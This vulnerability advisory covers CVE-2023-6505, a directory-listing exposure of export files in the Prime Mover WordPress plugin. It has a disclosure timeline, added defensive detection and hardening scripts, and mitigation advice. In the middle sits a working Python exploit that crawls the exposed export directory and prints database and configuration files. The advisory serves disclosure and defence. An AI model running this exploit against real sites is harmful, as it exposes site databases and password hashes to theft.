A critical vulnerability has been uncovered in the Prime Mover plugin, specifically within the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This vulnerability not only reveals comprehensive information about the site, including its configuration, directories, and files, but more critically, it grants unauthorized access to sensitive data within the database, presenting a significant security risk. The exploitation of this vulnerability could lead to potential brute force attacks on password hashes, posing an imminent threat to the compromise of the entire system.
Main info:

| Field | Value |
| --- | --- |
| CVE | CVE-2023-6505 |
| Plugin | Prime Mover < 1.9.3 |
| Critical | Super High |
| All Time | 160 361 |
| Active installations | 8 000+ |
| Publicly Published | December 12, 2023 |
| Last Updated | December 12, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6505 , https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629/ |
| Plugin Security Certification by CleanTalk | |
Timeline

| Date | Event |
| --- | --- |
| November 24, 2023 | Plugin testing and vulnerability detection in the Prime Mover plugin have been completed |
| November 24, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 2, 2023 | The author fixed the vulnerability and released the plugin update |
| December 12, 2023 | Registered CVE-2023-6505 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and everything the export contains. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding Directory Listing Attacks
Directory listing vulnerabilities involve the unintended exposure of directory contents, allowing unauthorized users to view files and directories. In WordPress, this could inadvertently reveal sensitive information, such as configuration details and file structures. Real-world examples highlight the risk of attackers leveraging such exposures to gain insights into the site’s infrastructure, potentially leading to unauthorized access and manipulation of sensitive data.
Exploiting the Directory Listing Vulnerability
Exploiting the vulnerability in Prime Mover involves utilizing the exposed directory to gain unauthorized access to sensitive data. Attackers may specifically target files containing password hashes, using this information to launch brute force attacks. Successful exploitation could lead to unauthorized access, manipulation of data, and other malicious activities, ultimately compromising the integrity and security of the entire system.
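As an added example (not code from the original advisory or from the Prime Mover project), the check below is the defender's counterpart to the exploitation described above: given the HTTP response body for the export directory, it decides whether the server returned a directory listing and which listed entries (database dumps, export archives, manifests) would be of concern. The HTML sample is constructed to resemble an Apache autoindex page and is not a capture from a real site; the sensitive-name patterns are an assumed list, and `check_url` is meant to be run only against a site you administer.

```python
"""Defender-side check: does a response for the Prime Mover export directory
expose a directory listing, and which listed entries are sensitive?
Added example; not part of the original advisory or the plugin."""
import re
import urllib.error
import urllib.request
from html.parser import HTMLParser

# Assumed list of file types that a leaked export directory is likely to contain
SENSITIVE_PATTERNS = (
    r"\.sql(\.gz)?$",        # database dumps
    r"\.(zip|tar\.gz)$",     # export packages
    r"\.(json|txt|log)$",    # manifests and logs carrying configuration details
    r"wp-config",            # copied site configuration
)


class _LinkCollector(HTMLParser):
    """Collect href values of <a> tags; autoindex pages link every entry this way."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def is_directory_listing(html: str) -> bool:
    """Heuristic for Apache/nginx autoindex output: an 'Index of' title or a parent-directory link."""
    return (bool(re.search(r"<title>\s*Index of", html, re.IGNORECASE))
            or "Parent Directory" in html
            or '<a href="../">../</a>' in html)


def listing_entries(html: str) -> list[str]:
    """Entries linked from the page, minus the parent link and the column-sort links (?C=...)."""
    collector = _LinkCollector()
    collector.feed(html)
    return [h for h in collector.hrefs if h not in ("../", "/") and not h.startswith("?")]


def sensitive_entries(entries: list[str]) -> list[str]:
    """Subset of entries whose names match one of the sensitive patterns."""
    return [e for e in entries if any(re.search(p, e, re.IGNORECASE) for p in SENSITIVE_PATTERNS)]


def assess_listing(html: str) -> dict:
    """Summarise exposure: whether listing is on, every listed entry, and the sensitive subset."""
    if not is_directory_listing(html):
        return {"exposed": False, "entries": [], "sensitive": []}
    entries = listing_entries(html)
    return {"exposed": True, "entries": entries, "sensitive": sensitive_entries(entries)}


def check_url(url: str, timeout: int = 10) -> dict:
    """Fetch a directory URL on a site you administer and assess the response.
    A 403/404 means listing is off for that path; an empty index.php stub returns 200 with no body."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return assess_listing(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as exc:
        return {"exposed": False, "entries": [], "sensitive": [], "status": exc.code}


# Constructed sample resembling an Apache autoindex response; not captured from a real site
SAMPLE_LISTING = """<html><head><title>Index of /wordpress/wp-content/uploads/prime-mover-export-files/1/</title></head>
<body><h1>Index of /wordpress/wp-content/uploads/prime-mover-export-files/1/</h1>
<pre><a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a>
<a href="../">Parent Directory</a>
<a href="20231124_export/">20231124_export/</a>
<a href="20231124_export.zip">20231124_export.zip</a>
<a href="database.sql">database.sql</a>
</pre></body></html>"""

# What the same URL returns once an empty index.php stub is in place
SAMPLE_PROTECTED = ""

if __name__ == "__main__":
    print(assess_listing(SAMPLE_LISTING))   # exposed, three entries, two sensitive
    print(assess_listing(SAMPLE_PROTECTED))  # not exposed
```

Running `check_url("https://your_site/wp-content/uploads/prime-mover-export-files/1/")` against your own installation after the update confirms the fix from the outside; an `exposed: True` result with `.sql` or `.zip` entries means the export directory is still browsable and the packages in it should be treated as disclosed.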
POC:
0) Go to Packages and create a new package (if no backup exists yet)
1) Go to this URL manually - http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/
2) Or you can use the exploit below
EXPLOIT (python3):
import requests
from bs4 import BeautifulSoup
import re
import time

# Export directory of the Prime Mover plugin on the test installation
base_url = "http://127.0.0.1/wordpress/wp-content/uploads/prime-mover-export-files/1/"
processed_files = set()
processed_folders = set()


def get_file_names(url):
    # Parse the directory listing and return every linked entry
    # except the parent link and the column-sort links (?C=...)
    response = requests.get(url)
    if response.status_code == 200 and len(response.text) > 0:
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a')
        file_names = []
        for link in links:
            file_name = link.get('href')
            # link.get() returns None for <a> tags without href; skip them
            if file_name and file_name != "../" and not file_name.startswith("?"):
                file_names.append(file_name)
        return file_names
    return []


def get_file_content(url, file_name):
    file_url = url + file_name
    # Ignore files ending in '.zip' or '.zip.*'
    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
        print(f"Ignoring file: {file_name}")
        return None
    file_response = requests.get(file_url)
    if file_response.status_code == 200:
        return file_response.text
    return None


# Poll the listing every 5 seconds and print new folders and file contents
while True:
    folders = get_file_names(base_url)
    if folders:
        print("Folders on the page:")
        for folder_name in folders:
            if folder_name not in processed_folders:
                print(folder_name)
                folder_url = base_url + folder_name
                files_in_folder = get_file_names(folder_url)
                if files_in_folder:
                    print("File names in the folder:")
                    for file_name in files_in_folder:
                        if file_name not in processed_files:
                            print(file_name)
                            file_content = get_file_content(folder_url, file_name)
                            if file_content is not None:
                                print("File content:")
                                print(file_content)
                            processed_files.add(file_name)
                processed_folders.add(folder_name)
    time.sleep(5)
___
The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers could exploit the exposed directory to conduct reconnaissance on the site’s structure, locate critical files, and access sensitive data within the database. This could lead to unauthorized access, data manipulation, and other malicious activities, jeopardizing the security of the entire system.
Recommendations for Improved Security
- Directory Security Measures: Implement robust security measures for directories, including access controls and regular audits to detect and address vulnerabilities promptly.
- Database Encryption: Employ encryption for sensitive data stored in the database to safeguard it even if unauthorized access occurs.
- Plugin Update: Ensure that the Prime Mover plugin is regularly updated with the latest security patches to address this vulnerability.
- Password Policy: Enforce strong password policies to minimize the risk of successful brute force attacks.
By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the Prime Mover vulnerability.
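The "Directory Security Measures" and "Plugin Update" points above can be verified on the server itself. The following script is an added example, not part of the advisory or of the Prime Mover plugin: it audits every prime-mover-export-files directory under wp-content/uploads for listing protection and adds what is missing (an empty index.php stub, as WordPress ships in its own uploads directory, plus `Options -Indexes` in .htaccess). It assumes an Apache 2.4 host that honours .htaccess overrides; on nginx the equivalent is `autoindex off;` in the server configuration. Nothing here replaces updating the plugin to 1.9.3 or later.

```python
"""Audit and harden Prime Mover export directories against directory listing.
Added example; assumes Apache 2.4 with AllowOverride enabled for the uploads path."""
from pathlib import Path

# Turns off autoindex for the directory; requires AllowOverride Options (assumed)
HTACCESS_NOINDEX = "Options -Indexes\n"
# Stronger setting: refuse every direct HTTP request to the directory (Apache 2.4 syntax)
HTACCESS_DENY = "<IfModule mod_authz_core.c>\n    Require all denied\n</IfModule>\n"
# Same stub WordPress places in wp-content/uploads so a listing request returns nothing
INDEX_STUB = "<?php\n// Silence is golden.\n"


def audit_export_dir(export_dir: Path) -> dict:
    """Report which listing protections are present in export_dir."""
    htaccess = export_dir / ".htaccess"
    rules = htaccess.read_text() if htaccess.is_file() else ""
    return {
        "index_stub": (export_dir / "index.php").is_file(),
        "options_noindex": "Options -Indexes" in rules,
        "deny_all": "Require all denied" in rules,
    }


def harden_export_dir(export_dir: Path, deny_direct_access: bool = False) -> list[str]:
    """Add the missing protections and return the names of the files written.

    deny_direct_access additionally blocks all HTTP access to the directory; enable it only
    if the plugin does not need to serve packages from this path over plain HTTP (assumption
    to verify against your deployment)."""
    state = audit_export_dir(export_dir)
    written = []
    if not state["index_stub"]:
        (export_dir / "index.php").write_text(INDEX_STUB)
        written.append("index.php")
    rules = []
    if not state["options_noindex"]:
        rules.append(HTACCESS_NOINDEX)
    if deny_direct_access and not state["deny_all"]:
        rules.append(HTACCESS_DENY)
    if rules:
        # Append rather than overwrite so existing rules in the file are kept
        with (export_dir / ".htaccess").open("a") as fh:
            fh.write("".join(rules))
        written.append(".htaccess")
    return written


def find_export_dirs(uploads_root: Path) -> list[Path]:
    """The export root plus every per-site subdirectory (prime-mover-export-files/<id>/)."""
    base = uploads_root / "prime-mover-export-files"
    if not base.is_dir():
        return []
    return [base] + sorted(p for p in base.iterdir() if p.is_dir())


if __name__ == "__main__":
    import sys
    root = Path(sys.argv[1] if len(sys.argv) > 1 else "wp-content/uploads")
    for d in find_export_dirs(root):
        print(d, audit_export_dir(d), "wrote:", harden_export_dir(d))
```

`Options -Indexes` and the index.php stub only remove the listing: anyone who already knows a package's file name can still fetch it, which is why the archive of an export that was ever exposed should be deleted or rotated, and why `deny_direct_access=True` is the safer choice where the plugin does not depend on direct downloads from this path.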
DMITRII I.